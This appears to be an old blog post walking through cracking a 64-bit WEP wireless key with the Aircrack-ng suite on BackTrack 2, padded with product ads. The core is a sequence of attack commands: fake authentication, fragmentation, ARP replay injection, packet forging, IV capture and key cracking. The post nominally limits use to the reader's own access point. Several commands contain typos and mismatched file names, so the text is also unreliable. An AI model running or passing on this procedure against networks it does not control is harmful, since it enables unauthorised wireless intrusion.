Breaking Wireless WEP key

Step by Step Breaking 64 BIT WEP key wireless

TP-LINK TL-WN722N 150M Wireless Lite N High Gain USB Adapter, 1 Detachable Antenna, Up to 150Mbps Wireless Data Rates 64/128 bits WEP WPA/WPA2, WPA-PSK/WPA2-PSK (TKIP/AES)


hey guys welcome to the world of wireless where nothing is seen but every thing is hacked haaaaaaaaa,today iam showing hacking a 64 bit wireless wep key

Recommended Hardware and software
any p 1 or p2 system or laptop with PCMICA card
Linksys WPC11 Instant Wireless-B Networking Adapter, PCMCIA Card

recommended cards
PC+netgear WG311t _atheros chipset
NETGEAR WG511T Super-G Wireless PC Card - Network adapter - CardBus - 802.11b, 802.11g
laptop=netgear WG511T_atheors chipset
OS:Back Track 2

Tools:Aircrack-ng suite tools
an Wifi Acces spoint+urs AP not others AP
Apple 8GB iPod Touch w/Built-in Wifi Web Browser & Acces

below are the commands to break

airmon-ng start wifio 11
wlanconfig ath0 destroy
export AP=MAC
export WIFI=MAC
ifconfig ath1 up
iwconfig ath1 mode monitor channel 11
aireplay-ng -1 0 -e linksys -a $AP -h $WIFI ath1
aireplay-ng -5 -b $AP -h $WIFI ath1
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.25
5.255 -l 255.255.255.255 -u fragment***.xor -w arp-reguest
airodump-ng -c 11 -bssid $AP --ivs -w cap ath1
aireplay-ng -2 -r arp-request ath1
aircrack-ng -n 64 $AP *.ivs

wait for 10 to 20 min u have crcaked WEP 64 bit key


11 + ur AP channel
ath0 or ath1 +ur wificard
AP=MAC ,ur AP MAC address u can get this buy running kismet
WIFI=MAC ur Wifi card MAc address
linksys: ur AP name


please let me know if any thing is not understood,


The three most dangerous things in the world are:
1. A programmer with a soldering iron,

Weller SP23LK Marksman 25 Watt Soldering Iron Kit
2. A hardware engineer with a program patch,
The Patch Program: Parental Agency Targeting Children's Health
3. A user with an idea.
How to Get Ideas 

No comments:

Post a Comment

LinkWithin

Related Posts Plugin for WordPress, Blogger...